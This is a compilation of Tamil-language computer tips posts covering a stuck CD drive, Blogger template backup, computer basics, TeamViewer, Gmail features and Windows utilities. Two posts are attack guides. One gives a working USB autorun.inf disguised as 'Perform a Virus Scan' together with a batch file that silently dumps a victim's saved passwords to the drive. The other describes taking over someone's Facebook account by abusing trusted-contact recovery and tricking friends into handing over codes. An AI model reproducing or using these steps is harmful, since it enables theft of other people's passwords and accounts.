கணணியில் சிக்கிக்கொண்ட சீடியை வெளியே எடுப்பதற்கு




நீங்கள் அடிக்கடி சீடி பயன்படுத்துபவராக இருந்தால் இந்த சூழ்நிலையில் நீங்கள் என்றாவது சிக்கி இருப்பீர்கள்.

ஆம் உங்கள் சீடி கணணியின் சீடி டிரைவில் இருந்து வெளியே வராமல் உங்களை மோசமான நிலையில் சிக்க வைக்கும்.

எத்தனை முறை சீடி டிரைவின் எஜெக்ட் பட்டனை அழுத்தினாலும் அப்படியே டிரைவ் வெளியே வராமல் இருக்கும். இந்த சூழ்நிலையில் என்ன செய்தால் சீடி டிரைவ் திறக்கப்பட்டு சீடி வெளியே எடுக்கும்படி கிடைக்கும் என்பதனைப் பார்க்கலாம்.

முதலில் சீடி டிரைவ் திறக்கப்பட்டு சிடி இருக்கும் அந்த பிளாஸ்டிக் ட்ரே வெளியே நீண்டு வரவில்லை என்றால் கவலைப்படாதீர்கள். இந்த சூழ்நிலையை சமாளித்து சீடியை கீழ்க்காணும் வழிகளைக் கையாண்டு வெளியே எடுக்கலாம்


வழி 1: மை கம்ப்யூட்டர் ஐகானில் கிளிக் செய்திடுங்கள். உங்கள் டெஸ்க்டொப்பில் இந்த ஐகான் இல்லை என்றால் நிச்சயம் ஸ்டார்ட் மெனுவில் இருக்கும். இதனைத் திறந்தவுடன் உங்கள் கணணியின் டிரைவ்கள் அனைத்தும் காட்டப்படும்.


இதில் Devices with removable stroage என்ற பிரிவில் சீடியின் படத்துடன் ஒரு ஐகான் இருக்கும். அல்லது சிக்கிக் கொண்ட சீடி ஏதேனும் ஒரு நிறுவனம் தந்துள்ள பேக்கேஜ் என்றால் நிறுவனம் தந்துள்ள ஐகானுடன் அந்த டிரைவ் காட்டப்படும்.


இதன் மீது ரைட் கிளிக் செய்திடுங்கள். கிடைக்கும் மெனுவில் Eject என்ற பிரிவில் கிளிக் செய்திடுங்கள். உங்கள் சீடி டிரைவில் உள்ள எஜெக்ட் பட்டன் தேய்ந்து போய் நீங்கள் அழுத்துகையில் அதன் செயல்பாடு மேற்கொள்ளப்படாத சூழ்நிலையில் இந்த வழி செயல்படும். இதற்கும் சீடி டிரைவ் திறக்கவில்லை என்றால் அடுத்த வழியைப் பார்க்கலாம்.


வழி 2: பேப்பர் கிளிப் ஒன்றை எடுத்துக் கொள்ளுங்கள். (ஜெம் கிளிப் என்றும் சிலர் இதனை அழைக்கின்றனர்) அதன் ஒரு முனையை பிரித்து நீட்டுங்கள். சீடி டிரைவின் எஜெக்ட் பட்டன் அருகே சிறிய துளை இருப்பதைக் காணுங்கள். நிச்சயம் இதுவரை நீங்கள் இதனைக் கண்டு கொள்ளாமல் இருந்திருப்பீர்கள்.


இப்போது நிச்சயம் இதன் உதவி வேண்டியதிருக்கிறது. இந்த துளையில் மெதுவாக பிரித்த பேப்பர் கிளிப்பின் சிறிய கம்பியை உள்ளே செலுத்தவும். சிறிது உள்ளே செலுத்தியவுடன் அது ஒரு இடத்திற்கு மேல் செல்லாது.

இந்த இடத்தில் சிறிய அளவில், மிகச் சிறிய அளவில் அழுத்தம் கொடுக்கவும். எஜெக்ட் செய்யும் போது இயங்கும் இன்டர்னல் லாக் உள்ள இடத்தில் இந்த அழுத்தம் கிடைப்பதால் டிரைவின் கதவு திறக்கும்.

உடனே சீடியை எடுத்துவிட்டு மீண்டும் டிரைவின் கதவினை மூடவும். மறக்காமல் பேப்பர் கிளிப் பின்னை எடுத்துவிடவும். ஏனென்றால் பலர் சீடி வெளியே வந்த சந்தோஷத்தில் பேப்பர் கிளிப்பைச் செருகியபடியே வைத்துவிடுவார்கள்.

டெம்பலேட் Backup/restore செய்வது எப்படி?

How to Backup/restore Blogger template


backup blog

This article is for absolute blogger beginners,about how to backup your blogger blog's template.This is very important thing that every blogger should beware of it. While adding or changing new features to your blog ,there may occur template crash.If you are not aware of this thing( backup template), it will affect your blogger blog's overall body language.So first you must know about backup your Blogger Blog Template.Follow the Steps 




Backup Blogger Blog Template

It is a simple method to backup your template,follow the steps.
  • First Make sure you had Sign In your blogger account
  • Go to Design->Edit HTML
  • There is a link "Download Full Template" at right side,click it


  •  Save it,You finished..!
The file you downloaded now is in the .XML format,so if any crash made on your template you just upload the downloaded XML file.

Upload/Restore Blogger Template

If any problem persist to your blogger blog's template upload the XML file.
  • Select Design->Edit HTML
  • There is a button (Browse) below the "Download Full template" link.Click on Browse
  • Choose the XML file you downloaded
  • Then Click on Upload button right to Browse button.
You are done,you had studied how to backup and restore your template.

ஓகே இப்ப ஒன்கட நிவ்  template. ரெடி..

கணினி



கணினி என்பது பல எலொக்ரொனிக் இளைகளினால் ஆன transistors, capacitors, diodes, resistors போன்றவற்றால் பல உறப்புகளை ஒன்றினைத்து உருவாக்கப் பெற்ற ஓர் எலெக்ரொனிக் இயந்திரம்

ஒபறேற்ரிங் சிஸ்ரம் என்னும் புறோகிறாம் மூலம் இயங்கச் செய்து,அதன் மூலம் ஒரு வேலையை துல்லியமாகவும், வேகமாகவும்; தன்னிச்சையாக செயல் பட்டு செய்விக்க கூடியதாக உருவாக்கப் பெற்ற ஒரு கருவியே கணினி என அழைக்கப் பெறுகின்றது.


கணினியின் முழுச் செயற்பாட்டிற்கும் அதில் உட்புகுத்தப் பெற்றுள்ள ஒபறேற்ரிங் சிஸ்ரமே அடித்தளமாகவும், உந்துசக்தியாகவும் அமைந்து; எல்லா உறுப்புகளையும் ஒன்றாக இணைத்து இயக்குகின்றது.


அது Application Software ன் பாவனையின் போது அதனுடன் இணைந்து அது இயங்கும் மேடையாக அமைந்து தேவையான சூழ்நிலையை உருவாக்கிக் கொடுத்து, அவ்வப்போது அவற்றில் முன்கூட்டியே பதியப்பெற்றுள்ள உபதேசங்களிற்கு அமைய; கட்டளைகளையும், அறிவுறுத்தல்களையும் CPU க்கு வழங்குவது ஒபறேற்ரிங் சிஸ்ரமே.



கணினிகளின் வகைகள்:

எல்லோருடைய எல்லாத் தேவைகளையும் பூர்த்தி செய்யும் வகையில் பலவித அளவுகளில் கணினிகள் உருவாக்கப் பெற்று, அவைகள் நான்கு வகைகளாக வகைப்படுத்தப் பெற்றுள்ளன.


அவையாவன:

1. Personal -Computers;
Desktop – Pc
Tower – Pc
Laptop – Pc
Hand held – Pc
Network – Pc
PC – Personal Computer – பிரத்தியேக கணினி என பொருள்படும்

2. Mini – Computers:
இது ஒரு டிபாட்மென்ரில் பாவிப்பது. இதன் மூலம் நூற்றுக் கணக்கான கணினிகளை ஒன்றிணைது ஒன்றிற் கொன்று தொடர்புடன் ஒரே நேரத்தில் இயக்க முடியும்.

3. Mainfram – Computers:
பெரிய நிறுவனங்களில் பாவிப்பது. இதன் மூலம் பல ஆயிரம் கணினிகளை ஒன்றிணைது ஒன்றிற் கொன்று தொடர்புடன் ஒரே நேரத்தில் இயக்க முடியும்.


4. Super – Computers:
நாசா போன்ற பெரிய ஆராச்சி நிலையங்களில் பாவிப்பது. வேகத்தில் கூடியதும், மில்லியன் கணக்கான வேலைகளை ஒரு செக்கண்டில் செய்யக்கூடியது.


இந்த எலெக்ரொனிக் (System Unit) இயந்திரத்தை உடம்பு எனவும், அதனை இயக்கும் (Operating System) ஒபறேற்ரிங் சிஸ்ரம் எனும் புறோக்கிறாமை உயிர் எனவும் அழைப்பர். உயிர் புகுத்தப்பெறாவிடில் உடலான இயந்திரம் இயங்காது. இந்த இயந்திரத்தில் உள்ள உறுப்புகளை Hard Ware “வன் பொருள்” எனவும்; இதில் (Install) உள்ளூட்டல் செய்யப்பெற்ற Operating System த்தையும் Application software யும் Soft Ware “மென் பொருள்” எனவும் அழைப்பார்கள்.



இந்த எலெக்ரொனிக் இயந்திரத்திற்கு மனித மொழி தெரியாது, ஆனால் மின்சாரம் பாயும் போது ”on” “1″ என்பதையும் மிசாரம் இல்லாத பொழுது ”off” “0″ என்பதனை மட்டும் உணரக்கூடியது. இதனை ஆதாரமாக வைத்தே இதனை இயக்கும் Soft Ware என்னும் மென்பொருள் Operating System எழுதப் பெற்று Install செய்கின்றார்கள். அதன் பின்னரே மனித மொழியை கணினி புரிந்து செயல்படுகின்றது. இந்த Soft Ware எழுதுவதற்கென்றே பல கணினி மொழிகள் உருவாக்கப் பெற்றுள்ளன (C++, Java, Pascal போன்றவை).

Team Viewer என்றால் என்ன?


உங்கள் கணினியில் அமர்ந்து கொண்டே எங்கோ இருக்கும் உங்கள் நண்பரின் கணினியை இயக்க முடியுமா? முடியும். இதற்கு ஒரு மென்பொருள் உள்ளது அதன் பெயர் Team Viewer. இந்த Remote Control வசதியை முழுக்க முழுக்க இலவசமாக வழங்கும் Team Viewer மென்பொருள் பற்றி இன்று காண்போம்.
Team Viewer என்றால் என்ன?
மேலே சொன்னது போல உங்கள் நண்பரின் கணினி அல்லது உங்கள் வீட்டு/அலுவக கணினி போன்றவற்றை நீங்கள் இருந்த இடத்தில் இருந்தே இணைய இணைப்பின் மூலம் இயக்க வைக்கும் மென்பொருள் தான் இது. Remote Control வசதி மூலம் குறிப்பிட்ட கணினியில் இருக்கும் பிரச்சனைகளை நீங்கள் சரி செய்ய முடியும். அந்தக் கணினியில் உள்ள மென்பொருட்களை இயக்க முடியும்.
இந்த மென்பொருளை தரவிறக்கம் செய்ய இந்த link-ல் செல்லவும்.
இப்போது இதை install செய்து கொள்ளவும். Install செய்யும் போது Non-Commercial Use என்பதை தெரிவு செய்யவும்.
எப்படி இதை பயன்படுத்துவது?
Install செய்த நண்பர்கள் உங்கள் கணினியில் Team Viewer-ஐ open செய்யவும்.
உங்களுக்கென ID & Password கொடுக்கப்பட்டு இருக்கும். அதை நீங்கள் உங்கள் நண்பருக்கு தந்தால் அவர் இணைய இணைப்பில் உள்ள உங்கள் கணினியை இணைய இணைப்பு உள்ள அவரது கணினியில் இருந்து Access செய்ய இயலும்.
நீங்கள் Access செய்ய வேண்டும் என்றாலும் உங்கள் நண்பரின் இந்த தகவல்களை நீங்கள் அறிந்திருக்க வேண்டும். உங்கள் நண்பர் கணினியின் Id தெரிந்தால் அதை Partner ID என்ற இடத்தில் கொடுத்து Connect To Partner என்று கொடுக்க வேண்டும். இப்போது வரும் குட்டி window-வில் அவரது Password-ஐ தர வேண்டும். இப்போது உங்கள் நண்பரின் கணினி உங்கள் கண் முன் விரியும்.
இதில் மேலும் ஒரு வசதி உள்ளது. File Transfer என்பது. இந்த File Transfer வசதி மூலம் நீங்கள் Access செய்யும் கணினியில் இருக்கும் உங்களுக்கு/அவருக்கு தேவைப்படும் File களை நீங்கள்/அவர் நேரடியாக உங்கள்/அவர் கணினிக்கு எடுத்துக் கொள்ளமுடியும்.
உங்கள் தனிப்பட பயன்பாடுகளுக்கு இது இலவசம். உங்கள் password-ஐ மாற்ற Teamviewer open செய்து Refresh போன்ற button (Password க்கு அடுத்து) click செய்து வைக்கலாம். சில நேரங்களில் நீங்களே தொடர்பு கொள்ள வேண்டி இருக்கலாம். மாறும் Password வேண்டாம் நினைவில் உள்ள மாதிரி நீங்களே வைத்து கொள்ள அதே button-ல் Set Predefined Password என்பதில் இதை நீங்கள் செய்யலாம்.
இனி உங்கள் கணினியில் ஏதேனும் மாற்றம் செய்ய வேண்டும் உங்களுக்கு தெரியவில்லை என்றால் உங்கள் நண்பரை ஒருவரை இதன் மூலமே செயல்பட வைக்க முடியும்.
இதில் முக்கியமான விஷயம் உங்கள் கணினியை உங்கள் நண்பர் Access செய்யும் போது அதை நீங்கள் பார்க்க முடியும். அவர் open செய்யும் ஒவ்வொன்றும் உங்கள் கணினி திரையில் தெரியும். எனவே பாதுகாப்பு பற்றி கவலைப் பட தேவை இல்லை. இருப்பினும் நம்பிக்கையான நபரை மட்டும் இது போன்ற செயல்களை செய்ய அனுமதியுங்கள். இதே போலவே File Transfer-க்கும்.
இதில் மீட்டிங் என்ற வசதியும் உள்ளது. 25 பேர் வரை இதில் இணைந்து ஒரே நேரத்தில் Video Conference போல செயல்பட முடியும்.
இதைப் பயன்படுத்த கட்டாயத் தேவைகள் என்ன?
முக்கியமாக இரண்டு கணினிகளிலும் Team Viewer இருக்க வேண்டும், அதே சமயம் இணைய இணைப்பு மிக மிக அவசியம்.

Pen Drive கொண்டு Passwords Hack செய்ய 100 % பயன் தரும் சிறந்த வழி


Pen Drive கொண்டு Passwords Hack செய்ய 100 % பயன் தரும் சிறந்த வழி மிகவும் அதிகமாய் பேசாமல் நேரா விஷயத்துக்கே  போவோம்.

01. முதலில் இதனை Download செய்துகொள்ளுங்கள்


02. அவற்றை USB Drive கு Copy செய்துகொள்ளுங்கள்

02. பிறகு Notepad திறந்து


[autorun]

open=launch.bat

ACTION= Perform a Virus Scan


என டைப் செய்துகொள்ளுங்கள். அதனை Autorun.inf என (.inf என்று முடியுமாறு) USB Drive இனுள் save செய்துகொள்ளுங்கள்.

03. பிறகு மீண்டும் Notepad திறந்து


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt


என டைப் செய்துகொள்ளுங்கள். அதனை . Lunch.bat என (.bat என்று முடியுமாறு) USB Drive இனுள் save செய்துகொள்ளுங்கள்.

04. அவ்வளவுடன் நிறுத்திகொள்ளாமல் நீங்கள் hack செய்யவேண்டிய Pc இல் உங்கள் usb ஐ Plug செய்து வரும் Autorun இல் Perform a Virus Scan என்பதை அழுத்துங்கள்.

""""அப்பறம் பாருங்க, 5 seccond கு பிறகு அவரின் Passwords எல்லாம் Txt வடிவில் உங்கள் Usb இல் இருக்கும் """""

மின்னஞ்சல் முகவரியில் புள்ளிகள்(dot).

Tamil Hacker's photo.

மின்னஞ்சல் முகவரிகளில் (MAIL ADDRESS) புள்ளிகளை (dots) பெயர்களில் பொதுவாக அமைப்பதில்லை. ஆனால் சிலர் இவற்றை இணைத்தே முகவரிப் பெயர்களை அமைக்கின்றனர்.
அதே போல ஒரு சில எழுத்துக்களை, ஆங்கிலத்தில் பெரிய எழுத்துக்களாகவும்(BLOCK LETTERS) அமைக்கின்றனர்.
எடுத்துக்காட்டாக, Albert.Einstein@gmail.com என்ற முகவரியில் புள்ளியும், பெரிய எழுத்தும் இணைக்கப்பட்டுள்ளது.
ஆனால், ஜிமெயிலைப் பொறுத்தவரை, புள்ளிகளும், சிறிய பெரிய எழுத்துக்களும் எந்த மாறுபாட்டினையும் கொள்வதில்லை.
மேலே கூறப்பட்ட மின்னஞ்சல் முகவரியினை கீழே உள்ளது போல பலவகைகளில் எழுதலாம்.
albert.einstein@gmail.com
alberteinstein@gmail.com
Al.Bert.Ein.Stein@gmail.com
இவை அனைத்தும் ஒன்றே. இவை அனைத்தும் ஒரே முகவரியை சென்று அடையும்.

ஜிமெயில் தகவல் திருடப்படுகிறதா?



மின்னஞ்சல் பயன்பாட்டில் ஜிமெயில் அக்கவுண்ட் முதல் இடத்தில் உள்ளது. மின் அஞ்சல் வசதியை அடிக்கடி பயன் படுத்தாதவர்களும், எதற்கும் இருக் கட்டுமே என்று ஒரு ஜிமெயில் அக்கவுண்ட்டை வைத்திருப்பார் கள்.
ஜிமெயில் தளத்தில் இப்போது புதியதொரு வசதி கிடைக்கிறது. இது ‘Last account activity’ என அழைக்கப் படுகிறது. இந்த வசதியை இயக்கிவிட்டால், உங்கள் ஜிமெயில் தளத்தை கடைசியாக யாரெல்லாம் அணுகிப் பார்த்தார்கள் என்ற பட்டியல் காட்டப்படுகிறது. கம்ப்யூட்டரில் பிரவுசர் வழியாகவோ, பி.ஓ.பி. மெயில் கிளையண்ட் வழியாகவோ அல்லது மொபைல் போன் மூலமோ, எந்த வகையில் உங்கள் ஜிமெயில் பார்க்கப் பட்டிருந்தாலும், அதனை இந்த வசதி பட்டியலிடுகிறது. எந்த ஐ.பி. முகவரியிலிருந்து இது பார்க்கப்பட்டது என்று காட்டுகிறது. வழக்கத்திற்கு மாறாக ஏதேனும் ஒரு ஐ.பி. முகவரியிலிருந்து உங்கள் ஜிமெயில் தளம் திறக்கப் பட்டிருந்தால், அதனைக் காட்டி எச்சரிக்கை செய்கிறது. எந்த நாள், நேரம் என்பவையும் பட்டியலில் கிடைக் கின்றன.
இதனைக் காண உங்கள் ஜிமெயில் தளத்தின் கீழாக, Last account activity என்ற வரிக்கு அருகே Details என்பதில் கிளிக் செய்திடவும். உடன் தகவல்கள் அடங்கிய பட்டியல் கிடைக்கும்.
இந்த பட்டியலில் Access type என்பதில், என்ன மாதிரியான வகையில் (பிரவுசர், மொபைல் போன், பி.ஓ.பி. கிளையண்ட் போன்றவை) உங்கள் தளம் அணுகப்பட்டது என்று காட்டப்படுகிறது. இந்த பட்டியலில் நீங்கள் பயன்படுத்தாத வகை எதுவும் காணப்பட்டால், உடனே உங்கள் அக்கவுண்ட் தகவல்களை (யூசர் நேம், பாஸ்வேர்ட்) யாரோ திருடி இருக்கிறார்கள் என நீங்கள் அறிந்து கொள்ளலாம். எடுத்துக் காட்டாக, நீங்கள் மொபைல் போன் வழி இணையத்தைப் பார்க்கும் வழக்கம் இல்லாதவராக இருந்து, பட்டியலில் மொபைல் போன் வழி பார்க்கப்பட்டது காட்டப்பட்டால், உங்கள் அக்கவுண்ட் திருடு போயுள்ளது என அறியலாம்.
அடுத்ததாக, Location (IP address) என்ற தலைப்பின் கீழ், உங்கள் ஜிமெயில் அக்கவுண்ட்டை அணுகிய பத்து ஐ.பி. முகவரிகள் தரப்படுகின்றன. இதில் சந்தேகப்படும்படியான ஐ.பி. முகவரிகள் எச்சரிக்கப்பட்டு காட்டப்படுகின்றன. இவ்வாறு ஏதேனும் காட்டப்பட்டால், உடனடியாக உங்கள் ஜிமெயில் அக்கவுண்ட்டின் பாஸ்வேர்டினை மாற்றுவது நல்லது.
உங்களுடைய ஐ.பி. முகவரியும் பட்டியலில் இருக்கும். இது உங்களுடையதுதானா? என்று எப்படி அறியலாம். இணைய இணைப்பு பெறுபவர்களுக்கு, ஒவ்வொரு முறையும் ஒரு ஐ.பி. முகவரி தரப்படுகிறதே என்ற சந்தேகம் உங்களுக்கு வரும். நீங்கள் பயன்படுத்தும் இணைய இணைப்பின் ஐ.பி. முகவரியின் முதல் இரு எண்கள் எப்போதும் மாறாமல் இருக்கும். எடுத்துக்காட்டாக, 172.16.xx.xx என்ற எண்ணில் இங்கு காட்டப்பட்டுள்ள முதல் இரு எண்களும், நீங்கள் ஒரே இணைய இணைப்பைப் பயன் படுத்தினால் எப்போதும் மாறாமலே இருக்கும். அதே போல, மொபைல் போன் வழியே ஜிமெயில் காண்பவர்களுக்கு, மொபைல் சேவை வழங்கும் நிறுவனத்தின் முதல் எண்கள் மாறாமல் இருக்கும். இவற்றிலிருந்து உங்களுடைய ஐ.பி. முகவரியினை அடையாளம் தெரிந்து கொள்ளலாம்.
ஒரே நேரத்தில், இருவேறு கம்ப்யூட்டர் களில், இரு வேறு இணைய இணைப்பு மூலம் ஜிமெயில் அக்கவுண்ட்டினை அணுகினால், அவை Concurrent sessions என்பதன் கீழ் தரப்படும்.
தகவல்களைத் திருடியவர்களும் இதே போல பட்டியல் பெற்று, உஷார் ஆகலாமே? என்று நாம் எண்ணலாம். ஜிமெயில் தளம் மிகக் கவனமாக இதனைக் கையாள்கிறது. வழக்கத்திற்கு மாறான ஐ.பி. முகவரிகளில் இருந்து அக்கவுண்ட் பார்க்கப்பட்டதாக இருந்தால், அந்த முகவரிகளுக்கு இந்த எச்சரிக்கைப் பட்டியல் காட்டப்படாது.
நம் அக்கவுண்ட் தகவல்கள் திருடப் பட்டுவிட்டன என்று உறுதியாக அறிந்தால், பாஸ்வேர்ட் மாற்றுவதுடன், கூகுள்http://www.google.com/help/security/ என்ற முகவரியில் தரப்படும் எச்சரிக்கை நடவடிக்கைகளையும் பின் பற்றவும்.
நான் அடிக்கடி கம்ப்யூட்டர், இணைய இணைப்பு, மொபைல் போன் ஆகியவற்றை மாற்றி என் ஜிமெயில் தளத்தினை அணுகுகிறேன். எனவே இது போலக் காட்டப்படும் எச்சரிக்கை பட்டியல் எனக்குத் தேவையில்லை என்று கருதுகிறீர்களா? அப்படியானால், இந்த வசதி இயங்குவதை நிறுத்திவிடலாம். இந்த பட்டியலின் கீழாக இதற்கான வசதி தரப்பட்டிருக்கிறது. ஆனால், நீங்கள் ஆப்ஷன் தெரிவித்து ஒரு வாரம் கழித்தே இந்த வசதி நிறுத்தப்படும்.

Facebook ஐ Hack செய்வது எப்படி? 100% Working


அனைவருக்கும் வணக்கம், நான் இன்று சொல்லித்தர போகும் விடயம் உங்கள் அனைவருக்கும் மிக்க பயனுள்ளதாய் அமையும் என்று நினைக்கின்றேன். நான் இந்த தளத்தினை ஆரம்பித்த நாள் முதல் நிறைய பதிவுகள் தந்துள்ளேன். எனினும் இந்த பதிற்கு பின் வரும் அனைத்து பதிவுகளுக்கும் மிக அதிகளிவிலான கருத்துக்கள் கிடைக்கும் என எதிர்பார்க்கின்றேன்.

சாதாரணமாக நாம் அனைவரும் சமூக வலைத்தளங்களை பாவித்து வருகின்றோம். அதில் ப்பேஸ்புக் என்பது மிக முக்கிறமானது என்றால் அது மிகையாகாது. அதில் கணக்குகளை வைத்திருப்பவர்கள் ஏராளம். அவ்வாறான ஒரு கணக்கை Hack செய்வது எப்படி என்பதைப்பற்றி கூறதான் இந்த பதிவு.

இது சில வேலைகளில் மட்டும் தான் சாத்தியமாகும் காரணம், ப்பேஸ்புக் ஹக் செய்ய மென்பொருட்கள் உருவாக்க முடியாது. இருப்பினும் இதனை செய்துபாருங்கள்.

முதலில் என்ற பிரதான தளத்திற்கு நுழைந்துகொள்ளுங்கள்.

அங்கு நீங்கள் செய்ய வேண்டியவரின் நுழைவுப்பெயரை (Username) சரியாக உட்செலுத்துங்கள். என்ன பாக்குறீங்க பாஸ்வர்ட் என்ன என்றா? பாஸ்வர்ட்கு பிதிலாக உங்கள் பெயரை பாவியுங்கள்.

அதன் பிறகு அங்கு அளித்த கடவுச்சொல் அல்லது பாஸ்வர்ட் பிழை என்று காட்டும். Forgot Your Password என்பதை கிலிக் செய்து ரிகவர் பக்கத்திற்குள் நுழைந்துகொள்ளுங்கள். அங்கு Username Or E-mail கொடுத்து ஹக் செய்யவேண்டியவரின் கணக்கை உறுதிப்படுத்தி கொள்ளுங்கள்.

அதன் பின்னர் வரும் விண்டோவில் No Longer Have Access to These? என்பதை சொடுககி நீங்கள் உருவாக்கிய புதிய E-mail முகவரியை கொடுத்து உறுதிப்படுத்துங்கள்.

அதன் பின்னர் ஹக் செய்யும் கணக்கின் நன்பர்கள் சிலரை தெரிவு செய்ய காட்டும். அதனூடாக 03 நன்பர்களை தெரிவு செய்துகொள்ளுங்கள்.

அதன் பின்னர் அவர்களின் பெயரை கொண்டும் உங்கள் கணக்கில் அவர்களை ந்னபர்களாக்கிகொண்டு அவர்களுக்கு வந்திருக்கும் கேட் இனை கேளுங்கள். அவர்களிடம் கோட் ஐ பெற்றுவிட்டால் அதன் கடைசியாக வந்த பக்கத்தில் கேட்கும் 03 கோட்களையும் கொடுத்து கடவுச்சொல்லை ரீசெட் செய்து அவர்களின் கணக்கில் நுழையலாம்.

இது சில வேலைகளில் மிக சிறப்பாக செயற்படாலாம், எனினும் அடுத்த பதிவு இன்னும் 05 நாட்களில் தர இருக்கின்றேன். அத்துடன் அதில் 100 வீதம் செயற்படகூடிய அளவு விதமொன்றை முன்வைக்க உள்ளேன்.

Viber: 4 கோடி பயனாளிகளைப் பெற்றது வைபர்




விவேக கைத்தொலைப்பேசி பயன்படுத்துபவர்களுக்கு இலவச குறுந்தகவல் மற்றும் அழைப்புகளை வழங்கும் செயலியான வைபர் (viber) இந்தியாவில் மட்டும் 4 கோடி பதிவு செய்யப்பட்ட பயனாளிகளைக் கொண்டிருக்கிறது. 
தினசரி பயனாளிகளின் எண்ணிக்கையில் மாற்றம் இருக்கலாம் என்றாலும், வைபர் செயலி தற்போது 193 நாடுகளில், 516 மில்லியன் பயனாளிகளைக் கொண்டுள்ளது, குறிப்பிடத்தக்கது. வைபரில் உள்ள பப்லிக் சாட் வசதி பயனாளிகளை மற்றவர்களுடன் தொடர்பில் இருக்க அனுமதிக்கவும் சுலபமான தகவல் பரிமாற்றத்திற்கும் உதவுகிறது.


iOS 9 Beta Download ( இலவச தரவிரக்கம் )


The next generation of iOS software is here. iOS 9 was spotted in testing as far back as October 2014 and has since turned up in benchmark tests, running on an iPhone 6, against iOS 8.  As usual, we expected to see the new firmware revealed for the first time in June 8 , when Apple held  their annual Worldwide Developers Conference and, on the day it is revealed, developers are given the first beta to look at. Update June 8th 2015 : iOS 9 has been released in beta . Scroll down below to see the updates and download links along with more information .
Image : iOS 9 Beta Download Date

ios 9 beta donwload


ios 9 apple


ipad ios 9


Download iOS 9 beta 1 IPSW :

Apple has finally officially announced iOS 9 . Downloads are available for developers who register their devices . Here is the link to the download page . You can also register your device with us just by paying $10 per device for a period of 1 year without paying the hefty $99 as required to pay for acquiring Apple’s developer account .
How much of these reports bear any truth will be revealed on June 8 and we will bring you all the news from the conference. Keep checking back to this page for more information and use the subscription options below to stay up to date.

டெஸ்க்டாபிலிருந்து ஜிமெயிலை பிரவுசர் இல்லாமல் பார்க்க








இதற்கு POP மற்றும் IMAP போன்ற உள்ளமைவு தேவை இல்லை.
ஆஃப் லைன்லேயும் உபயோகிக்க முடியும்.மெயில் அனுப்ப வேண்டுமென்றால்,மெயிலை எழுதி வைத்தால் இன்டெர்நெட் இணைப்பு கொடுக்கும் போது தானாகவே மெயில் send ஆகி விடும்.
இதற்காக தனியாக பயனர் கணக்கு வைக்க வேண்டாம்.ஜிமெயில் கணக்கின் தகவல்களை உள்ளீடு செய்தால் போதும்.
இது Windows, Mac மற்றும் Linux இயக்க முறைமை அமைப்பில் வேலை செய்யும்.


மென்பொருளை தரவிறக்க கீழே சொடுக்கவும்


விண்டோஸின் கூடுதல் பயன்களை பெறுவது எப்படி?



1.பென்சஸ் (Fences) : உங்கள் மானிட்டரின் திரை முழுவதும் ஐகான்கள் குவிந்து கிடக்கின்றனவா? 
சில வேளைகளில் டவுண்லோட் செய்த பைலுக்குரிய ஐகானைக் காண முடியவில்லையா? சிதறிக் கிடப்பதனால் ஒன்றுக்கொன்று தொடர்புடைய பைல்களை அடையாளம் காண முடியவில்லையா? 
விண்டோஸ் இயக்கம் இவற்றை வகைப்படுத்தி வைக்கும் வசதியைத் தரவில்லை.இந்தக் குறையை நீக்கும் வகையில் செயல்படுகிறது.
Fences என்னும் இலவச புரோகிராம். ஸ்டார்டாக் என்னும் நிறுவனம் இந்த புரோகிராமினை http://www.stardock.com/products/fences/ என்ற முகவரியில் உள்ள தனது தளத்தில் தருகிறது. 
இது உங்கள் ஐகான்களை குழு குழுவாக அமைத்து வேலிகளுக்குள் அமைத்துத் தருகிறது.எனவே மெயில், மூவி, இசைப்பாடல், ஷார்ட் கட்ஸ், கேம்ஸ், இன்னும் சில பிரிவுகளில் வேலி கட்டி ஐகான்களை அதற்குள் வைக்கலாம்.திரையில் காலியாக உள்ள இடத்தில் இருமுறை கிளிக் செய்தால் அனைத்து வேலிகளும் அவற்றின் உள்ள அமைக்கப்பட்டுள்ள ஐகான்களுடன் மறைந்து போகும். மீண்டும் டபுள் கிளிக் கொடுத்தால் அவை அனைத்தும் மீண்டும் காட்டப்படும். 

2. விண்டோஸ் ஆப்டிமம் (Windows Optimum):
இது விண்டோஸ் இயக்கத்தின் அனைத்து வேலைகளையும் கட்டுப்படுத்தும் சக்தியை உங்களுக்குத் தருகிறது.ஒரு பைலை ரீநேம் செய்திட முயற்சிக்கிறீர்கள்; அல்லது அழிக்க கட்டளை கொடுக்கிறீர்கள். உடனே ""பைலை இன்னொரு அப்ளிகேஷன் அல்லது இன்னொருவர் பயன்படுத்திக் கொண்டிருக்கிறார். எனவே முடியாது'' என்று விண்டோஸ் கூறும் செய்தியைக் காணலாம். 


இந்த புரோகிராம் இந்த தடைகளைத் தகர்க்கிறது.இதன் மூலம் விண்டோஸ் சிஸ்டம் வழங்கும் எந்த ஒரு சர்வீஸையும் நிறுத்தலாம்; ரெஜிஸ்ட்ரியில் உள்ள கீகளை நீக்கலாம்; நீங்கள் அட்மினிஸ்ட்ரேட்டராக லாக் இன் செய்யவில்லை என்றாலும் இந்த புரோகிராம் உங்களுக்கு அந்த அனுமதியைத் தருகிறது. ஒரு பைலைப் பயன்படுத்திக் கொண்டிருந்தாலும், அதனை நீக்கலாம்; "Access denied" "Another application is using the file" என்ற செய்தி எல்லாம் இனிமேல் வராது.எனவே இந்த புரோகிராமினை விண்டோஸ் இயக்கத்தினைப் புதிதாக இயக்குபவர்கள் சற்றுக் கவனத்துடன் கையாள வேண்டும். இதனைப் பெற http://net-studio.org/eng/windows-optimum.html என்ற முகவரியில் உள்ள தளம் செல்லவும்.


3. மீடியா இன்போ (Media Info):
ஒரு ஆடியோ அல்லது வீடியோ பைல்கள் குறித்து, அதன் பைல் ப்ராப்பர்ட்டீஸ் தரும் தகவல்கள் உங்களுக்கு நிறைவைத் தரவில்லையா?ஆடியோ மற்றும் வீடியோ பைல்கள் குறித்து, மிக விரிவான தகவல்களை இது தருகிறது. 
இதன் சிறப்பு இது அனைத்து வீடியோ மற்றும் ஆடியோ பைல் பார்மட்டுகளைக் கையாள்வதுதான்.
http://mediainfo.sourceforge.net/en என்ற தளத்தில் இதனைப் பெறலாம்.


பேஸ்புக்கிலிருந்து வரும் தேவை இல்லாத இமெயில்களை தடுப்பது எப்படி?







